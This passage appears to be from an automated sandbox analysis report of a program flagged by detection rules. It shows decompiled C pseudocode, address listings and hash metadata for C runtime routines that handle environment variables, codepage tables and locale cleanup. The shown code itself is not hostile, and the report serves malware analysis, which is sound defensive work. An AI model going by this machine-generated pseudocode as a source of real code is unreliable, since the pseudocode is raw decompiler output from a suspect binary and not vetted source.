																				if(__eflags == 0) {
																					goto L55;
																				} else {
																					_t302 =  *0x46b4d4; // 0x2ebce48
																					__eflags = _t302;
																					if(_t302 != 0) {
																						goto L64;
																					} else {
																						goto L62;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags = _t191;
																		if(_t191 == 0) {
																			goto L58;
																		} else {
																			_t196 = L0043C07A(_t221);
																			__eflags = _t196;
																			if(_t196 != 0) {
																				L63:
																				_t302 =  *0x46b4d4; // 0x2ebce48
																				__eflags = _t302;
																				if(_t302 == 0) {
																					L55:
																					_t221 = _t220 | 0xffffffff;
																					__eflags = _t221;
																					L56:
																					L0043EE85(_t288);
																					_t136 = _t221;
																					goto L57;
																				} else {
																					goto L64;
																				}
																			} else {
																				goto L54;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t197 = L00439E14();
														 *_t197 = 0x16;
														_t136 = _t197 | 0xffffffff;
														L57:
														return _t136;
													}
												} else {
													_t280 = _v16 + 1 + _t300 - _a4;
													asm("sbb eax, eax");
													 *(_t280 - 1) = _t218;
													_t204 = SetEnvironmentVariableA(_t300,  !( ~(_v5 & 0x000000ff)) & _t280);
													__eflags = _t204;
													if(_t204 == 0) {
														_t205 = L00439E14();
														_t218 = _t218 | 0xffffffff;
														__eflags = _t218;
														 *_t205 = 0x2a;
													}
													goto L42;
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L14:
									__eflags = _t120;
									if(_t120 == 0) {
										 *0x46b4d0 = L0043DFD9(_t231, 1, 4);
										L0043EE85(_t218);
										_t298 =  *0x46b4d0; // 0x2ea9f60
										_t320 = _t320 + 0xc;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L11;
										} else {
											__eflags =  *0x46b4d4 - _t218; // 0x2ebce48
											if(__eflags != 0) {
												goto L20;
											} else {
												 *0x46b4d4 = L0043DFD9(_t231, 1, 4);
												L0043EE85(_t218);
												_t320 = _t320 + 0xc;
												__eflags =  *0x46b4d4 - _t218; // 0x2ebce48
												if(__eflags == 0) {
													goto L11;
												} else {
													goto L19;
												}
											}
										}
									} else {
										_t218 = 0;
										goto L12;
									}
								} else {
									__eflags =  *0x46b4d4 - _t218; // 0x2ebce48
									if(__eflags == 0) {
										goto L14;
									} else {
										_t214 = L0043C075(0);
										__eflags = _t214;
										if(_t214 != 0) {
											L19:
											_t298 =  *0x46b4d0; // 0x2ea9f60
											L20:
											__eflags = _t298;
											if(_t298 == 0) {
												L11:
												_t218 = _t217 | 0xffffffff;
												__eflags = _t218;
												L12:
												L0043EE85(_t286);
												_t119 = _t218;
												goto L13;
											} else {
												goto L21;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				} else {
					_t215 = L00439E14();
					 *_t215 = 0x16;
					_t119 = _t215 | 0xffffffff;
					L13:
					return _t119;
				}
				L130:
			}








































































































                              0x00446266
                              0x0044626b
                              0x00446282
                              0x00446284
                              0x00446289
                              0x0044628d
                              0x0044628e
                              0x00446290
                              0x004462e0
                              0x004462e5
                              0x00000000
                              0x00446292
                              0x00446292
                              0x00446294
                              0x00000000
                              0x00446296
                              0x00446296
                              0x0044629a
                              0x004462a0
                              0x004462a3
                              0x004462a6
                              0x004462ac
                              0x004462af
                              0x004462b4
                              0x004462b6
                              0x004462b9
                              0x004462ba
                              0x004462ba
                              0x004462c0
                              0x004462c2
                              0x004462c4
                              0x00446358
                              0x0044635b
                              0x0044635d
                              0x0044635f
                              0x00446360
                              0x00446361
                              0x00446366
                              0x0044636b
                              0x0044636d
                              0x004463b7
                              0x004463b7
                              0x004463ba
                              0x00000000
                              0x004463c0
                              0x004463c0
                              0x004463c2
                              0x004463c5
                              0x004463c5
                              0x004463c8
                              0x004463ca
                              0x00000000
                              0x004463d0
                              0x004463d0
                              0x004463d6
                              0x00000000
                              0x004463dc
                              0x004463dc
                              0x004463de
                              0x004463e6
                              0x004463e8
                              0x004463ed
                              0x004463f0
                              0x004463f2
                              0x00000000
                              0x004463f8
                              0x004463f8
                              0x004463fb
                              0x004463fd
                              0x00446400
                              0x00446403
                              0x00000000
                              0x00446403
                              0x004463f2
                              0x004463d6
                              0x004463ca
                              0x0044636f
                              0x0044636f
                              0x00446371
                              0x00000000
                              0x00446373
                              0x00446376
                              0x0044637c
                              0x0044637f
                              0x00446382
                              0x00446396
                              0x00446396
                              0x00446399
                              0x00000000
                              0x00000000
                              0x00446392
                              0x00446395
                              0x00446395
                              0x00446395
                              0x0044639b
                              0x0044639d
                              0x004463a5
                              0x004463a7
                              0x004463ac
                              0x004463af
                              0x004463b1
                              0x004463b3
                              0x00446407
                              0x00446407
                              0x00446407
                              0x00446384
                              0x00446384
                              0x00446387
                              0x00446389
                              0x00446389
                              0x0044640d
                              0x00446410
                              0x00000000
                              0x00446416
                              0x00446416
                              0x00446418
                              0x0044641b
                              0x0044641b
                              0x0044641d
                              0x0044641e
                              0x0044641e
                              0x0044642a
                              0x00446432
                              0x00446435
                              0x00446436
                              0x00446438
                              0x00446481
                              0x00446482
                              0x00000000
                              0x0044643a
                              0x00446441
                              0x00446446
                              0x00446449
                              0x0044644b
                              0x0044648d
                              0x0044648e
                              0x0044648f
                              0x00446490
                              0x00446491
                              0x00446492
                              0x00446497
                              0x0044649b
                              0x0044649d
                              0x004464a0
                              0x004464a1
                              0x004464a4
                              0x004464a6
                              0x004464b8
                              0x004464b9
                              0x004464ba
                              0x004464bd
                              0x004464bf
                              0x004464c4
                              0x004464c8
                              0x004464c9
                              0x004464cb
                              0x0044651c
                              0x00446521
                              0x00000000
                              0x004464cd
                              0x004464cd
                              0x004464cf
                              0x00000000
                              0x004464d1
                              0x004464d1
                              0x004464d7
                              0x004464d9
                              0x004464dd
                              0x004464e0
                              0x004464e3
                              0x004464e9
                              0x004464eb
                              0x004464ec
                              0x004464f2
                              0x004464f5
                              0x004464f7
                              0x004464f7
                              0x004464fd
                              0x004464ff
                              0x0044658c
                              0x00446597
                              0x0044659a
                              0x0044659f
                              0x004465a4
                              0x004465a6
                              0x004465f0
                              0x004465f0
                              0x004465f3
                              0x00000000
                              0x004465f9
                              0x004465f9
                              0x004465fb
                              0x004465fe
                              0x004465fe
                              0x00446601
                              0x00446603
                              0x00000000
                              0x00446609
                              0x00446609
                              0x0044660f
                              0x00000000
                              0x00446615
                              0x00446615
                              0x00446617
                              0x0044661f
                              0x00446621
                              0x00446626
                              0x00446629
                              0x0044662b
                              0x00000000
                              0x00446631
                              0x00446631
                              0x00446634
                              0x00446636
                              0x00446639
                              0x0044663c
                              0x00000000
                              0x0044663c
                              0x0044662b
                              0x0044660f
                              0x00446603
                              0x004465a8
                              0x004465a8
                              0x004465aa
                              0x00000000
                              0x004465ac
                              0x004465af
                              0x004465b5
                              0x004465b8
                              0x004465bb
                              0x004465cf
                              0x004465cf
                              0x004465d2
                              0x00000000
                              0x00000000
                              0x004465cb
                              0x004465ce
                              0x004465ce
                              0x004465ce
                              0x004465d4
                              0x004465d6
                              0x004465de
                              0x004465e0
                              0x004465e5
                              0x004465e8
                              0x004465ea
                              0x004465ec
                              0x00446640
                              0x00446640
                              0x00446640
                              0x004465bd
                              0x004465bd
                              0x004465c0
                              0x004465c2
                              0x004465c2
                              0x00446646
                              0x00446649
                              0x00000000
                              0x0044664f
                              0x0044664f
                              0x00446651
                              0x00446651
                              0x00446654
                              0x00446654
                              0x00446657
                              0x0044665a
                              0x0044665a
                              0x00446665
                              0x00446669
                              0x00446671
                              0x00446674
                              0x00446675
                              0x00446677
                              0x004466be
                              0x004466bf
                              0x00000000
                              0x00446679
                              0x00446681
                              0x00446686
                              0x00446689
                              0x0044668b
                              0x004466ca
                              0x004466cb
                              0x004466cc
                              0x004466cd
                              0x004466ce
                              0x004466cf
                              0x004466d4
                              0x004466d7
                              0x004466d8
                              0x004466db
                              0x004466dc
                              0x004466df
                              0x004466e1
                              0x004466ea
                              0x004466ec
                              0x004466ee
                              0x004466f0
                              0x004466f2
                              0x004466f2
                              0x004466f5
                              0x004466f6
                              0x004466f6
                              0x004466f2
                              0x00446707
                              0x0044670a
                              0x0044670b
                              0x0044670d
                              0x00446774
                              0x00446774
                              0x00000000
                              0x0044670f
                              0x0044670f
                              0x00446712
                              0x00446764
                              0x00446766
                              0x0044676c
                              0x00000000
                              0x00446714
                              0x00446714
                              0x00446717
                              0x00446717
                              0x00446719
                              0x00446719
                              0x0044671b
                              0x0044671e
                              0x0044671e
                              0x00446720
                              0x00446721
                              0x00446721
                              0x00446725
                              0x0044672d
                              0x00446737
                              0x0044673a
                              0x0044673f
                              0x00446742
                              0x00446746
                              0x00000000
                              0x00446748
                              0x00446750
                              0x00446755
                              0x00446758
                              0x0044675a
                              0x00446779
                              0x0044677b
                              0x0044677c
                              0x0044677d
                              0x0044677e
                              0x0044677f
                              0x00446780
                              0x00446785
                              0x00446788
                              0x00446789
                              0x0044678b
                              0x0044678c
                              0x0044678d
                              0x0044678e
                              0x00446791
                              0x00446793
                              0x0044679c
                              0x0044679d
                              0x0044679f
                              0x004467a1
                              0x004467a3
                              0x004467a6
                              0x004467a7
                              0x004467a9
                              0x004467ab
                              0x004467ab
                              0x004467ae
                              0x004467af
                              0x004467af
                              0x004467ab
                              0x004467be
                              0x004467c2
                              0x004467c4
                              0x00446832
                              0x00446832
                              0x00000000
                              0x004467c6
                              0x004467c6
                              0x004467c8
                              0x00446822
                              0x00446823
                              0x00446829
                              0x00000000
                              0x004467ca
                              0x004467cc
                              0x004467cc
                              0x004467ce
                              0x004467ce
                              0x004467d0
                              0x004467d3
                              0x004467d3
                              0x004467d6
                              0x004467d9
                              0x004467d9
                              0x004467e9
                              0x004467f1
                              0x004467f7
                              0x004467fc
                              0x004467ff
                              0x00446803
                              0x00000000
                              0x00446805
                              0x0044680d
                              0x00446812
                              0x00446815
                              0x00446817
                              0x00446837
                              0x00446839
                              0x0044683a
                              0x0044683b
                              0x0044683c
                              0x0044683d
                              0x0044683e
                              0x00446843
                              0x00446846
                              0x00446849
                              0x0044684a
                              0x0044684b
                              0x0044684c
                              0x00446852
                              0x00446854
                              0x00446857
                              0x00446883
                              0x00446883
                              0x00446883
                              0x00446888
                              0x00446859
                              0x00446859
                              0x0044685c
                              0x00446862
                              0x00446867
                              0x0044686a
                              0x0044686c
                              0x00000000
                              0x0044686e
                              0x00446870
                              0x00446873
                              0x00446875
                              0x00446891
                              0x00446893
                              0x00446877
                              0x00446877
                              0x00446879
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446879
                              0x00446875
                              0x00000000
                              0x0044687b
                              0x0044687b
                              0x0044687e
                              0x0044687e
                              0x00000000
                              0x0044685c
                              0x0044688a
                              0x00446890
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446817
                              0x00000000
                              0x00446819
                              0x00446819
                              0x0044681c
                              0x0044681c
                              0x00446820
                              0x00446820
                              0x00000000
                              0x00446820
                              0x004467c8
                              0x00446795
                              0x00446795
                              0x0044682d
                              0x00446831
                              0x00446831
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044675a
                              0x00000000
                              0x0044675c
                              0x0044675c
                              0x0044675f
                              0x0044675f
                              0x00000000
                              0x00446763
                              0x00446712
                              0x004466e3
                              0x004466e3
                              0x0044676f
                              0x00446773
                              0x00446773
                              0x0044668d
                              0x00446691
                              0x00446694
                              0x0044669e
                              0x004466a6
                              0x004466ac
                              0x004466ae
                              0x004466b0
                              0x004466b5
                              0x004466b5
                              0x004466b8
                              0x004466b8
                              0x00000000
                              0x004466ae
                              0x0044668b
                              0x00446677
                              0x00446649
                              0x004465aa
                              0x00446505
                              0x00446505
                              0x0044650a
                              0x0044650d
                              0x0044653a
                              0x0044653a
                              0x0044653c
                              0x00000000
                              0x0044653e
                              0x0044653e
                              0x00446540
                              0x0044656b
                              0x00446575
                              0x0044657a
                              0x0044657f
                              0x00000000
                              0x00446542
                              0x0044654c
                              0x00446551
                              0x00446556
                              0x00446559
                              0x0044655f
                              0x00000000
                              0x00446561
                              0x00446561
                              0x00446567
                              0x00446569
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00446569
                              0x0044655f
                              0x00446540
                              0x0044650f
                              0x0044650f
                              0x00446511
                              0x00000000
                              0x00446513
                              0x00446513
                              0x00446518
                              0x0044651a
                              0x00446582
                              0x00446582
                              0x00446588
                              0x0044658a
                              0x00446527
                              0x00446527
                              0x00446527
                              0x0044652a
                              0x0044652b
                              0x00446532
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044651a
                              0x00446511
                              0x0044650d
                              0x004464ff
                              0x004464cf
                              0x004464a8
                              0x004464a8
                              0x004464ad
                              0x004464b3
                              0x00446535
                              0x00446539
                              0x00446539
                              0x0044644d
                              0x00446456
                              0x0044645e
                              0x00446462
                              0x00446469
                              0x0044646f
                              0x00446471
                              0x00446473
                              0x00446478
                              0x00446478
                              0x0044647b
                              0x0044647b
                              0x00000000
                              0x00446471
                              0x0044644b
                              0x00446438
                              0x00446410
                              0x00446371
                              0x004462ca
                              0x004462ca
                              0x004462cd
                              0x004462fe
                              0x004462fe
                              0x00446300
                              0x00446310
                              0x00446315
                              0x0044631a
                              0x00446320
                              0x00446323
                              0x00446325
                              0x00000000
                              0x00446327
                              0x00446327
                              0x0044632d
                              0x00000000
                              0x0044632f
                              0x00446339
                              0x0044633e
                              0x00446343
                              0x00446346
                              0x0044634c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0044634c
                              0x0044632d
                              0x00446302
                              0x00446302
                              0x00000000
                              0x00446302
                              0x004462cf
                              0x004462cf
                              0x004462d5
                              0x00000000
                              0x004462d7
                              0x004462d7
                              0x004462dc
                              0x004462de
                              0x0044634e
                              0x0044634e
                              0x00446354
                              0x00446354
                              0x00446356
                              0x004462eb
                              0x004462eb
                              0x004462eb
                              0x004462ee
                              0x004462ef
                              0x004462f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004462de
                              0x004462d5
                              0x004462cd
                              0x004462c4
                              0x00446294
                              0x0044626d
                              0x0044626d
                              0x00446272
                              0x00446278
                              0x004462f9
                              0x004462fd
                              0x004462fd
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
                              • String ID:
                              • API String ID: 2719235668-0
                              • Opcode ID: 0396f40de46c15702d6b6467e7c2b379eb71c483402df27b54df7b77d9a13a54
                              • Instruction ID: b3a0fccac4172db87641eb1f9af5537d347888dfd9dcec10cf93ff69a179e89b
                              • Opcode Fuzzy Hash: 0396f40de46c15702d6b6467e7c2b379eb71c483402df27b54df7b77d9a13a54
                              • Instruction Fuzzy Hash: 17D127719003007BFB20AF75984266B7BA4EF07718F06016FE945D7382EB799901CB9E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043E23C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0043E23C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46a00c; // 0x7df2b874
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x4577a8;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x457a28;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x457ba8;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return L0042F61B(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = L0043DFD9(_t172, 1, 4);
					L0043EE85(_t170);
					_v32 = L0043DFD9(_t172, 0x180, 2);
					L0043EE85(_t170);
					_v36 = L0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_v40 = L0043DFD9(_t172, 0x180, 1);
					L0043EE85(_t170);
					_t197 = L0043DFD9(_t172, 0x101, 1);
					_v52 = _t197;
					L0043EE85(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						L0043EE85(_v44);
						L0043EE85(_v32);
						L0043EE85(_v36);
						L0043EE85(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = L0044348A(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = L0044348A(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = L00447F5C(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										L0043EE85( *(_t215 + 0x90) - 0xfe);
										L0043EE85( *(_t215 + 0x94) - 0x80);
										L0043EE85( *(_t215 + 0x98) - 0x80);
										L0043EE85( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								L0043EE85(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044A26E(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}



















































                              0x0043e244
                              0x0043e24b
                              0x0043e250
                              0x0043e253
                              0x0043e256
                              0x0043e259
                              0x0043e25c
                              0x0043e262
                              0x0043e265
                              0x0043e268
                              0x0043e26b
                              0x0043e26e
                              0x0043e273
                              0x0043e593
                              0x0043e595
                              0x0043e597
                              0x0043e597
                              0x0043e59a
                              0x0043e5a0
                              0x0043e5a2
                              0x0043e5a8
                              0x0043e5ae
                              0x0043e5b8
                              0x0043e5c2
                              0x0043e5c9
                              0x0043e5d9
                              0x0043e5d9
                              0x0043e279
                              0x0043e27c
                              0x0043e281
                              0x0043e29f
                              0x0043e2a9
                              0x0043e2ac
                              0x0043e2bf
                              0x0043e2c2
                              0x0043e2d0
                              0x0043e2d3
                              0x0043e2e1
                              0x0043e2e4
                              0x0043e2f5
                              0x0043e2f8
                              0x0043e2fb
                              0x0043e300
                              0x0043e306
                              0x0043e55a
                              0x0043e55d
                              0x0043e565
                              0x0043e56d
                              0x0043e575
                              0x0043e57f
                              0x0043e57f
                              0x00000000
                              0x0043e32f
                              0x0043e32f
                              0x0043e331
                              0x0043e331
                              0x0043e334
                              0x0043e335
                              0x0043e34b
                              0x00000000
                              0x00000000
                              0x0043e351
                              0x0043e354
                              0x0043e357
                              0x00000000
                              0x00000000
                              0x0043e364
                              0x0043e367
                              0x0043e36a
                              0x0043e387
                              0x0043e38c
                              0x0043e38f
                              0x0043e391
                              0x00000000
                              0x00000000
                              0x0043e3ab
                              0x0043e3bb
                              0x0043e3c0
                              0x0043e3c5
                              0x00000000
                              0x00000000
                              0x0043e3cf
                              0x0043e3fc
                              0x0043e412
                              0x0043e415
                              0x0043e41a
                              0x0043e41f
                              0x00000000
                              0x00000000
                              0x0043e425
                              0x0043e42a
                              0x0043e430
                              0x0043e433
                              0x0043e436
                              0x0043e439
                              0x0043e43c
                              0x0043e43f
                              0x0043e446
                              0x0043e449
                              0x0043e44c
                              0x0043e44e
                              0x0043e454
                              0x0043e457
                              0x0043e459
                              0x0043e49b
                              0x0043e49d
                              0x0043e4a6
                              0x0043e4ab
                              0x0043e4ae
                              0x0043e4b8
                              0x0043e4ba
                              0x0043e4bd
                              0x0043e4bf
                              0x0043e4c8
                              0x0043e4ca
                              0x0043e4cc
                              0x0043e4cd
                              0x0043e4d8
                              0x0043e4dd
                              0x0043e4e1
                              0x0043e4ef
                              0x0043e502
                              0x0043e510
                              0x0043e51b
                              0x0043e520
                              0x0043e4e1
                              0x0043e523
                              0x0043e526
                              0x0043e52c
                              0x0043e535
                              0x0043e53a
                              0x0043e543
                              0x0043e54c
                              0x0043e555
                              0x0043e580
                              0x0043e583
                              0x00000000
                              0x0043e460
                              0x0043e460
                              0x0043e463
                              0x0043e463
                              0x0043e467
                              0x00000000
                              0x00000000
                              0x0043e469
                              0x0043e472
                              0x0043e490
                              0x0043e490
                              0x0043e496
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043e496
                              0x0043e47a
                              0x0043e47d
                              0x0043e482
                              0x0043e483
                              0x0043e486
                              0x0043e48c
                              0x00000000
                              0x0043e47d
                              0x00000000
                              0x0043e498
                              0x0043e3d6
                              0x0043e3d6
                              0x0043e3d9
                              0x0043e3d9
                              0x0043e3dd
                              0x00000000
                              0x00000000
                              0x0043e3df
                              0x0043e3e3
                              0x0043e3f0
                              0x0043e3e8
                              0x0043e3ec
                              0x0043e3ec
                              0x0043e3ed
                              0x0043e3ed
                              0x0043e3f4
                              0x0043e3f7
                              0x0043e3fa
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043e3fa
                              0x00000000
                              0x0043e3d9
                              0x0043e3cf
                              0x0043e306
                              0x0043e28f
                              0x0043e294
                              0x0043e299
                              0x00000000
                              0x00000000
                              0x00000000

                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$Info
                              • String ID:
                              • API String ID: 2509303402-0
                              • Opcode ID: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction ID: 6b2bdcf8ba42ba7e642015036dc949e4624d86c0fc26f2591f5c67e68ea4a483
                              • Opcode Fuzzy Hash: fca23b915922a1d6a493f4f724e80eb8bc58a3daeca01358566e9a6e63a64209
                              • Instruction Fuzzy Hash: 42B19F71901205AEDB11DFAAC881BEEBBF4FF0C304F14516EF855A7282DA79A845CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004480F6, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004480F6(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							L0043EE85(_t46);
							E00447332( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							L0043EE85(_t47);
							L004477EC( *((intOrPtr*)(_t74 + 0x88)));
						}
						L0043EE85( *((intOrPtr*)(_t74 + 0x7c)));
						L0043EE85( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					L0043EE85( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					L0043EE85( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					L0043EE85( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00448269( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							L0043EE85(_t31);
							L0043EE85( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							L0043EE85(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return L0043EE85(_t74);
			}















                              0x004480fe
                              0x00448102
                              0x0044810a
                              0x00448113
                              0x00448118
                              0x0044811f
                              0x00448127
                              0x0044812f
                              0x0044813a
                              0x00448140
                              0x00448141
                              0x00448149
                              0x00448151
                              0x0044815c
                              0x00448162
                              0x00448166
                              0x00448171
                              0x00448177
                              0x00448118
                              0x00448178
                              0x00448180
                              0x00448193
                              0x004481a6
                              0x004481b4
